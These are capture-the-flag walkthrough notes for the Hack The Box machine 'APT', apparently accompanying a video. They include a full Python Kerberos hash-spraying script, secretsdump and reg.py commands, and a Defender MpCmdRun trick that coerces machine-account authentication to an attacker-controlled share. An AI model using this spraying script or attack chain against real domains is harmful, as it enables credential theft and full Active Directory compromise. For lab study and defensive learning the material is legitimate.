APT
Notes for https://youtu.be/ZnUIiVwNSHk

User

python3 IOXIDResolver.py -t apt.htb
Address: apt
Address: 10.129.124.109
Address: dead:beef::8884:1fcc:ce90:638f

Secretsdump from backup.zip

secretsdump.py -system SYSTEM -security SECURITY -ntds ../Active\ Directory/ntds.dit LOCAL | tee hashes

Spray Hashes

Modified from here by InfoSecJack:
#!/usr/bin/python3
from __future__ import division
from __future__ import print_function
import sys
import argparse
import socket
from time import sleep
import re
from impacket.smbconnection import SMBConnection
from impacket import smbconnection
import multiprocessing
import traceback
import argparse
import sys
from binascii import unhexlify
from impacket.krb5.kerberosv5 import getKerberosTGT, KerberosError
from impacket.krb5 import constants
from impacket.krb5.types import Principal
import multiprocessing
import socket
def gethost_addrinfo(hostname):
    """Resolve *hostname* to a bare address string, preferring IPv6.

    The lookup is attempted with ``AF_INET6`` first; if that raises
    ``socket.gaierror`` it is retried with ``AF_INET``.  When the lookup
    yields several entries the address of the *last* entry wins.  An
    empty result list leaves no address bound and raises
    ``UnboundLocalError`` on return, as the original did.
    """
    def lookup(family):
        # Same hints as the original call: datagram type, IP proto,
        # canonical-name flag; only the address family varies.
        return socket.getaddrinfo(
            hostname, None, family,
            socket.SOCK_DGRAM, socket.IPPROTO_IP, socket.AI_CANONNAME,
        )

    try:
        entries = lookup(socket.AF_INET6)
    except socket.gaierror:
        entries = lookup(socket.AF_INET)

    # Walk every entry; the last sockaddr seen is the one returned.
    for _family, _socktype, _proto, _canonname, sockaddr in entries:
        last_sockaddr = sockaddr

    return last_sockaddr[0]
def _login(username, password, domain, lmhash, nthash, aesKey, dc_ip):
    """Try one Kerberos AS-REQ for *username* against the DC at *dc_ip*.

    Args:
        username: account name, wrapped in an NT_PRINCIPAL Principal.
        password: cleartext password (empty string when spraying hashes).
        domain: Kerberos realm passed to getKerberosTGT.
        lmhash, nthash: hex-encoded hashes; both are unhexlify'd here, so
            they must be valid hex ('' is accepted and becomes b'').
        aesKey: AES key forwarded unchanged to getKerberosTGT.
        dc_ip: DC hostname or address; resolved via gethost_addrinfo on
            every call, i.e. one DNS lookup per attempt.

    Returns:
        True when a TGT was obtained, False on any KerberosError, and
        None when the DC could not be reached (socket.error).
    """
    dc_ip = gethost_addrinfo(dc_ip)
    try:
        kerb_principal = Principal(username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
        getKerberosTGT(kerb_principal, password, domain,
                       unhexlify(lmhash), unhexlify(nthash), aesKey, dc_ip)
        print('[+] Success %s/%s' % (domain, username) )
        return True
    except KerberosError as e:
        # Returns immediately: everything below this line in the handler is
        # unreachable, so unknown-principal / revoked / wrong-realm errors are
        # never reported and the caller only ever sees False.
        # NOTE(review): each KDC_ERR_PREAUTH_FAILED presumably counts towards
        # the account's lockout threshold and is logged KDC-side — confirm
        # against the target policy before spraying many values.
        return False
        if (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_C_PRINCIPAL_UNKNOWN.value) or (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_CLIENT_REVOKED.value) or (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_WRONG_REALM.value):
            print("[-]Could not find username: %s/%s" % (domain, username) )
        elif e.getErrorCode() == constants.ErrorCodes.KDC_ERR_PREAUTH_FAILED.value:
            return
        else:
            print(e)
    except socket.error as e:
        # Connection-level failure; `e` is caught but not used in the message.
        print('[-]Could not connect to DC')
        return
# Realm and the single account every hash is tried against.
DOMAIN, USERNAME = 'htb.local', 'henry.vinson'
def login(username, hash):
    """Attempt a hash-based Kerberos pre-auth for *username*.

    Thin wrapper over ``_login``: empty password and LM hash, no AES key,
    realm ``DOMAIN`` and DC ``apt6.htb``.  The parameter name ``hash``
    shadows the builtin but is kept for the existing call sites.

    Returns:
        Whatever ``_login`` returns (True on success, False/None otherwise).
    """
    return _login(
        username,
        '',          # password: unused, pre-auth is hash-based
        DOMAIN,
        '',          # lmhash
        hash,        # nthash (hex string)
        None,        # aesKey
        "apt6.htb",  # dc_ip, resolved inside _login
    )
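# hashes.txt holds one NT hash per line — credential material.  Read it
# under `with` so the handle is closed (the original left it open) and
# keep the file out of version control / remove it when finished.
with open("hashes.txt") as hash_file:
    passwords = [line.strip() for line in hash_file]

# Declared but never referenced: attempts run back-to-back with no delay.
SLEEP_TIME = 5

# One pre-auth attempt per hash; stop at the first one the DC accepts.
for x in passwords:
    if login(USERNAME, x):
        print(f"[+] Success {x}")
        sys.exit()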

Dump Remote Registry

reg.py htb.local/[email protected] -hashes :*** query -keyName HKU -s | tee hku.reg

Root

Authenticate with Machine Account to our box

C:\progra~1\Window~1\Mpcmdrun.exe -Scan -ScanType 3 -File '\\***\xct\xct'

Secretsdump with Machine Account

secretsdump.py htb.local/'APT$'@apt6.htb -hashes :***